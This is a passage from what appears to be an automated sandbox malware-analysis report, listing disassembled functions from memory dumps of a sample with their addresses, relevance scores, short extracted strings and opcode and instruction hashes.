Function 00007FFD9BA8E89F Relevance: 1.0, Instructions: 1007COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20ca5d8e71af70568a1610c6b377fa2e9dce4000fa22f2855dc4ed3655c32699
Instruction ID: 2fc03b4b622487676ef0dd5fb75097ee4f3d65da4f27eb8463beb5c6281d6300
Opcode Fuzzy Hash: 20ca5d8e71af70568a1610c6b377fa2e9dce4000fa22f2855dc4ed3655c32699
Instruction Fuzzy Hash: FC72C330F1995E8FEB68DBA8C4A16BCB7E1FF48304F1145BDD05ED3692DA7869428B40

Function 00007FFD9BA83857 Relevance: .7, Instructions: 663COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e7819083af0f1ad67619264232c7177e26453caf6c1ca63fb7a4a5538510a9
Instruction ID: 0b503c941c4f662fcb71bc2b9bc3c5c7e627a441030ac2244951207d872d1468
Opcode Fuzzy Hash: 32e7819083af0f1ad67619264232c7177e26453caf6c1ca63fb7a4a5538510a9
Instruction Fuzzy Hash: 8932A130A4EA8E8FDB55EF6488695B97BF0FF19300F0604FBE419C75A2DA74A644C741

Function 00007FFD9BA81490 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144528ff3db13224c422f54677f38ee2c0ccb7d5ed842623ba3ec7485a6f7750
Instruction ID: d4f2731f63df01145993be6388875a780b7a6f91e669cb779de3f7f608b93728
Opcode Fuzzy Hash: 144528ff3db13224c422f54677f38ee2c0ccb7d5ed842623ba3ec7485a6f7750
Instruction Fuzzy Hash: 3D12C030E0AA4E8FEB64EFA4C4656FD7BF1FF69300F15017AD009D75A1DA78A6458B80

Function 00007FFD9BA82B38 Relevance: .6, Instructions: 557COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506235e0963d6d6332294f06129c9a3973878390a184e63e3f699ed1350de817
Instruction ID: e18f30c5e0be4cad9587e2b6b7d9193fc50f81920879f16eb537ff5130dabd01
Opcode Fuzzy Hash: 506235e0963d6d6332294f06129c9a3973878390a184e63e3f699ed1350de817
Instruction Fuzzy Hash: 2E12D230E0EA4E8FDBA9EFA4C4655BD7BE1FF58300F0145BAD019C75A2DA78AA41C740

Function 00007FFD9BA82B30 Relevance: .5, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f438adaa96823a39e4589942afc7650f55fe27dfad49bf7b2f3afb44edd61d47
Instruction ID: 18a332b07d219aeef25f0e13e7628a1c329561e8d2fcbde92ea4799bf1e7aa5c
Opcode Fuzzy Hash: f438adaa96823a39e4589942afc7650f55fe27dfad49bf7b2f3afb44edd61d47
Instruction Fuzzy Hash: 68E1D130E0AA4E8FEBA5DF6488696B97BF1FF18310F0104BAD419C75A2DF74AA44C741

Function 00007FFD9B7D35A5 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4192563250.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9b7d0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c957f062564e97eb6583698e8224a1fd73fc9ac6f083d367b03dc1dbe81eaa08
Instruction ID: 95b6266b0cb8630fdf39e9fe244264a29f905c03ff9acd3c85d593490e79fd73
Opcode Fuzzy Hash: c957f062564e97eb6583698e8224a1fd73fc9ac6f083d367b03dc1dbe81eaa08
Instruction Fuzzy Hash: BFA1B471A19A4D8FEB94DB68C8657EDBBE1FF99350F4102BAD00DD32E6DB7824058740

Function 00007FFD9BA8B638 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39bab06f733444f56da9c4af20e9cc135d6b338d6b5e3f8aa04ac8b795ff9e5c
Instruction ID: d092a5883b3c1fb0105ff145ba9f52d82d6ca5849b810db067425da4556b73e7
Opcode Fuzzy Hash: 39bab06f733444f56da9c4af20e9cc135d6b338d6b5e3f8aa04ac8b795ff9e5c
Instruction Fuzzy Hash: B9A14A30E0964E8FDB98EFA8C4696BD7BF0FF18304F11057AD41AD72A2DA75A644CB40

Function 00007FFD9BA86D74 Relevance: 6.4, Strings: 5, Instructions: 104COMMON

Download Yara Rule

Strings

w, xrefs: 00007FFD9BA876F1
J, xrefs: 00007FFD9BA887B8
;~, xrefs: 00007FFD9BA86EE2, 00007FFD9BA88790
', xrefs: 00007FFD9BA87688
, xrefs: 00007FFD9BA86EF0

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: $'$J$w$;~
API String ID: 0-1682065468
Opcode ID: c8ffe6a2a36a701817ef48377ffdbf99d8b9544f9a2d0ca720ad13917c53f537
Instruction ID: 88c827e5207676234696eca1aa85b47236b942149e1b03cfe50b96292edc7094
Opcode Fuzzy Hash: c8ffe6a2a36a701817ef48377ffdbf99d8b9544f9a2d0ca720ad13917c53f537
Instruction Fuzzy Hash: 6B419770A0662D8FEBA8DF94C868BA9B7B1FB54300F1145E9D40DE76A0CBB45E80CF10

Function 00007FFD9BA874BA Relevance: 3.8, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

w, xrefs: 00007FFD9BA876F1
N, xrefs: 00007FFD9BA8832A
c, xrefs: 00007FFD9BA874C7

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: N$c$w
API String ID: 0-2074695964
Opcode ID: 35648d1b9d9278cb8738d10252bea53dd120fd5bbe35513b51b18093b54b9457
Instruction ID: e282e6fc71f349389adb3a59b43145ebf88c3c0ce16c2d2c35a772023bfbda2c
Opcode Fuzzy Hash: 35648d1b9d9278cb8738d10252bea53dd120fd5bbe35513b51b18093b54b9457
Instruction Fuzzy Hash: 58314B35A0A91E8BEB78EF44C864BA9B3B5FB45350F0105BAD40DE7690DE746B80CF80

Function 00007FFD9BA8687F Relevance: 2.6, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

w, xrefs: 00007FFD9BA876F1
Q, xrefs: 00007FFD9BA8691B

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: Q$w
API String ID: 0-2914425004
Opcode ID: cbf37d3cfff4a184baedfe71bfdb623865d4fb058a5cc6fd25f406a7107b16e8
Instruction ID: e32ddf2659291e528cefde57c3e5601860009effad88fb935d3ff2ede370b1bd
Opcode Fuzzy Hash: cbf37d3cfff4a184baedfe71bfdb623865d4fb058a5cc6fd25f406a7107b16e8
Instruction Fuzzy Hash: 01412F75E0691E8FEBB4DF48D854BA9B3B1FB94311F0101BAD40DE76A0DE756A908F40

Function 00007FFD9BA878F7 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

w, xrefs: 00007FFD9BA876F1
q, xrefs: 00007FFD9BA87982

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: q$w
API String ID: 0-2516311628
Opcode ID: 632c9ac4cd980e4d3277566611b36e245b4f823c8ed539963d03ba87f40298fd
Instruction ID: 39b76cf4fc7c944c67cb76ec82f25de31f6d423994554713e275bd493e0ab38e
Opcode Fuzzy Hash: 632c9ac4cd980e4d3277566611b36e245b4f823c8ed539963d03ba87f40298fd
Instruction Fuzzy Hash: 6541E471A4592E8FEB64EF58C854BE9B7B0FB55311F0105E9D40CE7291DB74AA80CF90

Function 00007FFD9BA8707C Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

w, xrefs: 00007FFD9BA876F1
n, xrefs: 00007FFD9BA870B3

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: n$w
API String ID: 0-2189507073
Opcode ID: 5657c434e25173a386b32956f6aa3afd34fcbe730306fd8825d2484c08fa9ec5
Instruction ID: a90c0480aeba7f7d20560c518d5a96119dc33ca7b9926af82adbb7e1d2ebbd17
Opcode Fuzzy Hash: 5657c434e25173a386b32956f6aa3afd34fcbe730306fd8825d2484c08fa9ec5
Instruction Fuzzy Hash: E1216D35A0691E8BEB78EF54C8646E9B3B4FB54311F0105BAD40DE7290DE746B808F40

Function 00007FFD9BA86ED3 Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

w, xrefs: 00007FFD9BA876F1
B, xrefs: 00007FFD9BA885F8

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: B$w
API String ID: 0-3017180549
Opcode ID: 505d48e436076b501ced02a63f13ee9ba49cecf502e2a633d0add9d4b782e630
Instruction ID: ae36266a15743bb8b2e68acd7683448a907ddb7abfa854d05f9720a7a89c3868
Opcode Fuzzy Hash: 505d48e436076b501ced02a63f13ee9ba49cecf502e2a633d0add9d4b782e630
Instruction Fuzzy Hash: F321B870E0652A8FEB78DF54C8A4BF8B7B1EF54310F1141AED41EA3AA1DA745A90DF00

Function 00007FFD9BA87724 Relevance: 2.5, Strings: 2, Instructions: 35COMMON

Download Yara Rule

Strings

w, xrefs: 00007FFD9BA876F1
l, xrefs: 00007FFD9BA87772

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: l$w
API String ID: 0-2164649583
Opcode ID: 6d2580a3d2ff5f137e83cb9086d65d1ef5e53f6da2915c4679ff92329aac2c81
Instruction ID: 5446e056212f1289cfd2ae1838aee0544287882aa7a38cf5a1f02616f136ec80
Opcode Fuzzy Hash: 6d2580a3d2ff5f137e83cb9086d65d1ef5e53f6da2915c4679ff92329aac2c81
Instruction Fuzzy Hash: 9701DA34A0691E8FEB68EF44D854BB873B2EB94300F1141FAD40DE36A1CE756E908F50

Function 00007FFD9BA878B3 Relevance: 2.5, Strings: 2, Instructions: 16COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9BA878E7
c, xrefs: 00007FFD9BA878BA

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: d$c
API String ID: 0-2841058053
Opcode ID: 23eded961c998719a6bb42b83fe27c72c9dae84bda14dcaff26e6f1c89ea5af1
Instruction ID: 62406702ab44ec71ddc8dc1fd444b888f1cda4666a762709d77e5ad319b345b2
Opcode Fuzzy Hash: 23eded961c998719a6bb42b83fe27c72c9dae84bda14dcaff26e6f1c89ea5af1
Instruction Fuzzy Hash: D5E0F570D1AA1D8AEBB4DB58D9647A8B6B1EB58300F4101E9940EE2661CA796E80CF01

Function 00007FFD9BA8C400 Relevance: 1.8, Strings: 1, Instructions: 547COMMON

Download Yara Rule

Strings

[#_H, xrefs: 00007FFD9BA8C9EF

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: [#_H
API String ID: 0-1114056511
Opcode ID: 06bc99faad6602c83fea97b4303aa2d2ec6b495483a1af1721c21bae5042c291
Instruction ID: 152bf375aeeaa0933efa886ecef0bac150013be39257c102900a016b10ac7346
Opcode Fuzzy Hash: 06bc99faad6602c83fea97b4303aa2d2ec6b495483a1af1721c21bae5042c291
Instruction Fuzzy Hash: 27123370E19A1D8FDB64EB68C865BE977B1FF58300F4105B9D00DE36A2DE396981CB41

Function 00007FFD9B7EB02A Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

c, xrefs: 00007FFD9B7EB02D

Memory Dump Source

Source File: 0000001F.00000002.4192563250.00007FFD9B7E2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9b7e2000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: d343ee9807c40816ad0b9d4c9f045b11ca410f1d40fa3f8293d5bba9ad82a715
Instruction ID: f32d2592b05f9f7590689372a3c57c0547b3403596c6b6a36f0d37ecce404c90
Opcode Fuzzy Hash: d343ee9807c40816ad0b9d4c9f045b11ca410f1d40fa3f8293d5bba9ad82a715
Instruction Fuzzy Hash: 19E1C63170DA4E8FDB68DA5CC8A56A83BD1FF98310F1503B9D45DC73B2DE24A9068741

Function 00007FFD9BA8CDE0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

U#_H, xrefs: 00007FFD9BA8CF6D

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: U#_H
API String ID: 0-2729988108
Opcode ID: bd71c33ee7db7c26c799ee81031b27908bcfd077713ec1f1fcb92ea41c018495
Instruction ID: 0a58359600d67bccb1352a45f8ddbf7f2c28b8bf6e8c0901541230f6e454d634
Opcode Fuzzy Hash: bd71c33ee7db7c26c799ee81031b27908bcfd077713ec1f1fcb92ea41c018495
Instruction Fuzzy Hash: 5F81D531A09A4E8FDB55EBA4C864AED7BF1FF45310F0500BAD049D76A6DF78A842C740

Function 00007FFD9BA8B618 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

U#_H, xrefs: 00007FFD9BA8CF6D

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: U#_H
API String ID: 0-2729988108
Opcode ID: f7b6eb263068a24d182e1628c4eb002a34919b7d54613b543d134715e3232cab
Instruction ID: d020f6d5ef155126977b89913ba9c46320f491f6c78a8825a6d6332b528edce1
Opcode Fuzzy Hash: f7b6eb263068a24d182e1628c4eb002a34919b7d54613b543d134715e3232cab
Instruction Fuzzy Hash: F3817C30E1990E8FEB98EBA8C865ABD77F1FF58300F410179D00AD76A5DE78A941CB40

Function 00007FFD9B7DC858 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

K|N, xrefs: 00007FFD9B7DC86F

Memory Dump Source

Source File: 0000001F.00000002.4192563250.00007FFD9B7DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9b7da000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: K|N
API String ID: 0-1165900090
Opcode ID: aa26ce064e95021e90758e50d862c451eb9476bc3087421d14247d4988b60cf9
Instruction ID: b9a7fac74f6a9c5012520d89db56b0ff025c7d3be716c9d671c5b576cfc23627
Opcode Fuzzy Hash: aa26ce064e95021e90758e50d862c451eb9476bc3087421d14247d4988b60cf9
Instruction Fuzzy Hash: 8751C41BB0C2A649E715B7BCB8654ED3710DFC13BAF2A43B3D29DCD0E79C18204A8294

Function 00007FFD9BA8B588 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

#a, xrefs: 00007FFD9BA91452, 00007FFD9BA914EF

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: #a
API String ID: 0-1613607475
Opcode ID: 9fe73da11e65cfdca51e815246e71b20101fead857410aff76eb964585070ab9
Instruction ID: 7f59f2b1b5c3809e86dad03c65c70f76ea87143478b5bb1492a17c119c57325c
Opcode Fuzzy Hash: 9fe73da11e65cfdca51e815246e71b20101fead857410aff76eb964585070ab9
Instruction Fuzzy Hash: 35717E70E0A61D9FEB60DBA4C4547FDB7B1EF65300F510179D00EA72A2DAB86A84DB40

Function 00007FFD9BA8BE6A Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

e#_H, xrefs: 00007FFD9BA8BF6D

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: e#_H
API String ID: 0-1385408685
Opcode ID: 31e8c88ac803f9ac17b9823c21bdafb2b3abc19ea53c5be6dbbf734464ffaee3
Instruction ID: 502d7e7c4b109d2f39927e3c794e847e0301069b2042be9771ab30f6ba130503
Opcode Fuzzy Hash: 31e8c88ac803f9ac17b9823c21bdafb2b3abc19ea53c5be6dbbf734464ffaee3
Instruction Fuzzy Hash: E8718F71E09A4E8FEB64DBA8C4656FD7BF0FF58300F51047AD00AD76A2DA75A944CB40

Function 00007FFD9BA906F3 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

#a, xrefs: 00007FFD9BA90789

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: #a
API String ID: 0-1613607475
Opcode ID: e7fb0a58ef9f63c945b8b7cb586a9298c1086cd3d6e0b4cdeb3a28ef4cf157bb
Instruction ID: 4028d0816ac74fe7c70ca05c9dd66772caf6ab30c5f3d5c656778078d54df215
Opcode Fuzzy Hash: e7fb0a58ef9f63c945b8b7cb586a9298c1086cd3d6e0b4cdeb3a28ef4cf157bb
Instruction Fuzzy Hash: 2B61D770E0991D8EEBB4EB98C4647BCB7B1FF58340F5140B9D00DE32A2DE746A819B44

Function 00007FFD9BA8CEA8 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

U#_H, xrefs: 00007FFD9BA8CF6D

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: U#_H
API String ID: 0-2729988108
Opcode ID: a2e5ccf128020eaf339964b4b7853f4bee7d0b1ce3ab08887edfedf470ea4d43
Instruction ID: 2adb8fe6bbdc4b8c1974682323d1b2e97ee459571385886d6ae01b010819b10f
Opcode Fuzzy Hash: a2e5ccf128020eaf339964b4b7853f4bee7d0b1ce3ab08887edfedf470ea4d43
Instruction Fuzzy Hash: 56516F71F1490E9FEB98EBA8C8A5ABD77F1FF54310F410079D01AD76A5DE78A8428B40

Function 00007FFD9B7EE028 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9B7EE0A2

Memory Dump Source

Source File: 0000001F.00000002.4192563250.00007FFD9B7E2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9b7e2000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 38bf752200c377cd13950ce9a9bd1f348f5517b6ff6489bd6d31074a37b5e213
Instruction ID: 4c3f55da3eb43e33daa3e86b7a8930b5b89e4b1bbc29fc787513dc39266115c6
Opcode Fuzzy Hash: 38bf752200c377cd13950ce9a9bd1f348f5517b6ff6489bd6d31074a37b5e213
Instruction Fuzzy Hash: 06514071E0964E8FDB58DB98D4645FDB7B1FF48300F1146BAD01AE72B6CA352941CB50

Function 00007FFD9B7ECEB9 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

UM_L, xrefs: 00007FFD9B7ECF72

Memory Dump Source

Source File: 0000001F.00000002.4192563250.00007FFD9B7E2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9b7e2000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: UM_L
API String ID: 0-3885789759
Opcode ID: 5464aa088d839117e982185c7c1d7607f8b16140f794ed4ae72683fa5810d079
Instruction ID: dcfe4f6b13b8e0e83621c78e4424f2ab18769328671a2552acb3a9ba4b24a002
Opcode Fuzzy Hash: 5464aa088d839117e982185c7c1d7607f8b16140f794ed4ae72683fa5810d079
Instruction Fuzzy Hash: FE31B236F1EA0E8FE77487A884659BD77E0FF49300B660276E00EDB1B1DE3869019351

Function 00007FFD9BA86A6A Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

#, xrefs: 00007FFD9BA883EB

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: a0caca34f3d656f8ac013c0e743d5ad0b5cf55a7f33caea4ea324fba55f92e54
Instruction ID: 9789fc992394f44826e2b6ef67e2d2a705e43922e426b2c0fae10c53e4396845
Opcode Fuzzy Hash: a0caca34f3d656f8ac013c0e743d5ad0b5cf55a7f33caea4ea324fba55f92e54
Instruction Fuzzy Hash: 1D212D71E0A91E8BDBB8EF55D8686B8B7B4EF44311F0101BAD40D97691DE782B80CF40

Function 00007FFD9B7EAEF2 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

sM_^, xrefs: 00007FFD9B7EAF45

Memory Dump Source

Source File: 0000001F.00000002.4192563250.00007FFD9B7E2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9b7e2000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: sM_^
API String ID: 0-1910684456
Opcode ID: 377828846aa46a29c7304ab8b1ea74a72e2ef3fbae02f84a719ac83f3f225d6e
Instruction ID: 865870230c6caa8ee210d47ad01bde64b12d393c7e59c1f769df49b387aceb2a
Opcode Fuzzy Hash: 377828846aa46a29c7304ab8b1ea74a72e2ef3fbae02f84a719ac83f3f225d6e
Instruction Fuzzy Hash: A411C570E1991EDFDB98DB88D4A09ACBBB1FF58304F510579D00AE72A1DB34A9418B10

Function 00007FFD9BA8D153 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

T#_, xrefs: 00007FFD9BA8D164

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: T#_
API String ID: 0-1205947321
Opcode ID: fca83718d0cf828418e23c76a441f9f4e39c8b1724cd9fce443cff4bdb0a54ec
Instruction ID: 2dba4bff80ee344a9e62548cf84c6533b25a55d9270716610b9477180b5af2d8
Opcode Fuzzy Hash: fca83718d0cf828418e23c76a441f9f4e39c8b1724cd9fce443cff4bdb0a54ec
Instruction Fuzzy Hash: 91D02BB2E0F64D47E73787A418304A416419F12700F17017AE4DD473D3DAA43E00C311

Function 00007FFD9B7E00FB Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

G, xrefs: 00007FFD9B7E0119

Memory Dump Source

Source File: 0000001F.00000002.4192563250.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9b7e0000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: c129ef198dedc0db23ceef2481cf838adafc14fc2b9642ed2932cdcd92ae3f07
Instruction ID: 9152211b5180fb56f2d2b4d2a6831975af0025649d64de830410a1a32a88b77e
Opcode Fuzzy Hash: c129ef198dedc0db23ceef2481cf838adafc14fc2b9642ed2932cdcd92ae3f07
Instruction Fuzzy Hash: 34D092B090861D8FDBA4DF08C8947AC76B1BF58344F1002AAD20DD22A0CB345B948F09

Function 00007FFD9BA94417 Relevance: 1.0, Instructions: 983COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.4197470428.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9ba80000_MwDxnowBVCiAiIllnkPs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118f07a462efadd46a14b28c1a23d17cb020f650d5a1db64fab141f91d53640d
Instruction ID: 22718684513be57ffd64bff3c9db71915e07149bae2bb4c8cc498206628fa51d
Opcode Fuzzy Hash: 118f07a462efadd46a14b28c1a23d17cb020f650d5a1db64fab141f91d53640d
Instruction Fuzzy Hash: CD825970E19A1D8FDFA9EB58C8A5BA8B7B1FB59301F5101E9D10DE36A1CE755A80CF00

Function 00007FFD9BA8C314 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

